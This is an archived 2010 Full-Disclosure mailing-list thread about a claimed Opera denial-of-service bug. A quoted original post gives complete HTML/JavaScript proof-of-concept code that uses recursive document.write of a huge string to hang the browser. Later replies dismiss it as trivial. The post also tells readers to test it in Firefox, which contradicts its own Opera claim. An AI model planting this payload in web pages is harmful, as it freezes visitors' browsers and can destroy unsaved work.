Date: Wed, 3 Mar 2010 22:05:22 +1100
From: Jeff Williams <jeffwillis30@...il.com>
To: full-disclosure@...ts.grok.org.uk
Subject: Re: Opera (plenitude String )Denial of Service Exploit

You get a life.

Fixed.


2010/3/3 information security <informationhacker08@...il.com>

> Thanks, Jeff, for all your comments.
> So how to fix that?
>
>
> On Tue, Mar 2, 2010 at 8:42 PM, Jeff Williams <jeffwillis30@...il.com> wrote:
>
>> You gotta be joking, this is probably the 3000th DoS "advisory" for
>> document.write.
>>
>> Guess what sparky, even Jeremy Brown didn't post that one.
>>
>> Thus no surprise exploit-db posts this kind of shit.
>>
>>
>> 2010/3/3 information security <informationhacker08@...il.com>
>>
>>> ======================================================================
>>> Opera (plenitude String )Denial of Service Exploit
>>> ======================================================================
>>>
>>> by
>>>
>>> Asheesh Kumar Mani Tripathi
>>>
>>>
>>> # code by Asheesh kumar Mani Tripathi
>>>
>>> # email informationhacker08@...il.com
>>>
>>>
>>>
>>> # company       www.aksitservices.co.in
>>>
>>> # Credit by Asheesh Anaconda
>>>
>>>
>>> #Download http://www.opera.com/download/
>>>
>>>
>>>
>>>
>>> #Background
>>>
>>> Opera is a popular internet browser :)
>>>
>>> #Vulnerability
>>> This bug is a typical result when an attacker tries to write a plenitude String in
>>> the document.write() function. User interaction is required to
>>> exploit this vulnerability in that the target must visit a malicious
>>> web page.
>>>
>>>
>>>
>>> #Impact
>>> The browser no longer responds to any user input, all tabs are no
>>> longer accessible, and your work, if any, might be lost.
>>>
>>>
>>>
>>>
>>>
>>> #Proof of concept
>>> Copy the code into a text file, save it as "asheesh.html", and open it in Mozilla Firefox
>>>
>>> ========================================================================================================================
>>>
>>>
>>>
>>>                                                            asheesh.html
>>> ========================================================================================================================
>>>
>>> <html>
>>>
>>>
>>>
>>> <title>asheesh kumar mani tripathi</title>
>>> Asheesh kumar Mani Tripathi
>>> <head>
>>>
>>> <script>
>>> 	
>>> 	
>>> 	
>>> function asheesh ()
>>>  {
>>> 	var	i , anaconda = "XXXX"
>>> 	for(i=24;i >0 ;--i)
>>>
>>>
>>>
>>>  {
>>> 		anaconda=anaconda+anaconda;
>>> 	}
>>>
>>>     document.write(anaconda);
>>>
>>>   asheesh();
>>>
>>> }
>>> asheesh();
>>>
>>> </script>
>>> </head>
>>>
>>> <body onLoad="asheesh()"></body>
>>>
>>>
>>>
>>> </html>
>>>
>>>
>>>
>>> ========================================================================================================================
>>> Why do you worry without cause? Whom do you fear without reason? Who can kill you?
>>>
>>>
>>>
>>> The soul is neither born, nor does it die.
>>>
>>>
>>> #If you have any questions, comments, or concerns, feel free to contact me.
>>>
>>>
>>> _______________________________________________
>>> Full-Disclosure - We believe in it.
>>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>>> Hosted and sponsored by Secunia - http://secunia.com/
>>>
>>
>>
>
